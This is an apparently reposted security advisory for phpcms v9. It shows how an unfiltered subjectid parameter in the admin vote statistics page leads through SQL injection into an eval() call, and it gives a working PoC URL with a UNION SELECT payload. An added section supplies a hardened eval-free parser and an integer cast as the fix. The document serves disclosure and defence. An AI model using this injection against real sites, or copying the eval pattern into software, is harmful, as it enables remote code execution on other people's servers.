phpcms v9 backend (sql inj) 2 (code exec) vulnerability

ID MYHACK58:62201131802
Type myhack58
Reporter Anonymous
Modified 2011-09-08T00:00:00


Author: sdk original: Google looking to go.

phpcms v9 backend (sql inj) 2 (code exec) vulnerability, by flyh4t - Low profile development

The phpcms v9 string2array() function uses the eval function, so in more than one place it may cause a code execution vulnerability.

```php
function string2array($data) {
	if($data == '') return array();
	eval("\$array = $data;");
	return $array;
}
```

For example, the voting results statistics (requires backend privileges), in /moudles/vote/vote.php:

```php
/**
 * Poll result statistics
 */
public function statistics() {
	$subjectid = $_GET['subjectid'];
	$show_validator = $show_scroll = $show_header = true;
	// Get the poll information
	$sdb = pc_base::load_model('vote_data_model'); // load the voting statistics data model
	$infos = $sdb->select("subjectid = $subjectid",'data'); // $subjectid is not filtered
	// Create a new array for storing the newly combined data
	$total = 0;
	$vote_data = array();
	$vote_data['total'] = 0; // total count across all voting options
	$vote_data['votes'] = 0; // number of voters
	// Loop over each member's voting record
	foreach($infos as $subjectid_arr) { // the SQL injection vulnerability controls the results
		extract($subjectid_arr);
		$arr = string2array($data); // goes into the eval function
		foreach($arr as $key => $values){
			$vote_data[$key]+=1;
		}
		$total += array_sum($arr);
		$vote_data['votes']++;
	}
	$vote_data['total'] = $total;
	// Fetch the vote options
	$options = $this->db2->get_options($subjectid);
	include $this->admin_tpl('vote_statistics');
}
```

PoC code:

```
index.php?m=vote&c=vote&a=statistics&show_type=1&subjectid=0 union select 0x706870696E666F2829/&siteid=1&pc_hash=LFeCIl
```

The pc_hash value is different each time.
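A hardened counterpart to string2array(), as an added example that is not phpcms code or the original author's: it parses the stored array text with PHP's tokenizer instead of eval() and rejects anything that is not a literal, and the last line casts subjectid to an integer before it reaches select(). The names parse_literal() and safe_string2array() are hypothetical, and the stored vote data is assumed to be var_export()-style text.

```php
<?php
// Added example, not phpcms code. parse_literal() and safe_string2array() are
// hypothetical names; input is assumed to be var_export()-style text.
function parse_literal(array &$toks) {
    $t = array_shift($toks);
    list($id, $text) = is_array($t) ? array($t[0], $t[1]) : array($t, (string)$t);
    if ($id === T_CONSTANT_ENCAPSED_STRING && $text[0] === "'") {
        // Single-quoted strings only; their sole escapes are \\ and \'
        return strtr(substr($text, 1, -1), array('\\\\' => '\\', "\\'" => "'"));
    }
    if ($id === T_LNUMBER && ctype_digit($text)) return (int)$text;
    if ($id === T_DNUMBER && is_numeric($text)) return (float)$text;
    if ($id === '-') {
        $n = parse_literal($toks);
        if (is_int($n) || is_float($n)) return -$n;
    } elseif ($id === T_STRING) {
        $consts = array('true' => true, 'false' => false, 'null' => null);
        if (array_key_exists(strtolower($text), $consts)) return $consts[strtolower($text)];
    } elseif ($id === T_ARRAY && array_shift($toks) === '(') {
        $out = array();
        while ($toks) {
            if ($toks[0] === ')') { array_shift($toks); return $out; }
            $v = parse_literal($toks);
            if ($toks && is_array($toks[0]) && $toks[0][0] === T_DOUBLE_ARROW) {
                if (!is_int($v) && !is_string($v)) break;   // keys: int or string only
                array_shift($toks);
                $out[$v] = parse_literal($toks);
            } else { $out[] = $v; }
            if ($toks && $toks[0] === ',') array_shift($toks);
            elseif (!$toks || $toks[0] !== ')') break;      // missing separator
        }
    }
    // Function names, calls, variables, comments, tags: everything else lands here.
    throw new InvalidArgumentException('rejected non-literal input');
}
// Replacement for string2array(): no eval(), returns array() on rejected input.
function safe_string2array($data) {
    $data = trim((string)$data);
    if ($data === '') return array();
    $toks = array_values(array_filter(token_get_all('<?php ' . $data), function ($t) {
        return !(is_array($t) && in_array($t[0], array(T_OPEN_TAG, T_WHITESPACE), true));
    }));
    try { $v = parse_literal($toks); } catch (InvalidArgumentException $e) { return array(); }
    return (is_array($v) && !$toks) ? $v : array();  // trailing tokens are rejected too
}
// Constructed inputs: a stored vote record, then the string the PoC's hex literal decodes to.
foreach (array("array ( 1 => '1', 3 => '1', )", 'phpinfo()') as $s) var_dump(safe_string2array($s));
// SQL side of the fix: force the id to an integer before building the WHERE clause.
$subjectid = isset($_GET['subjectid']) ? intval($_GET['subjectid']) : 0;
```

A token allowlist followed by eval() would not be enough here, because PHP 7 and later treat a quoted string followed by parentheses as a function call; the parser above never evaluates its input.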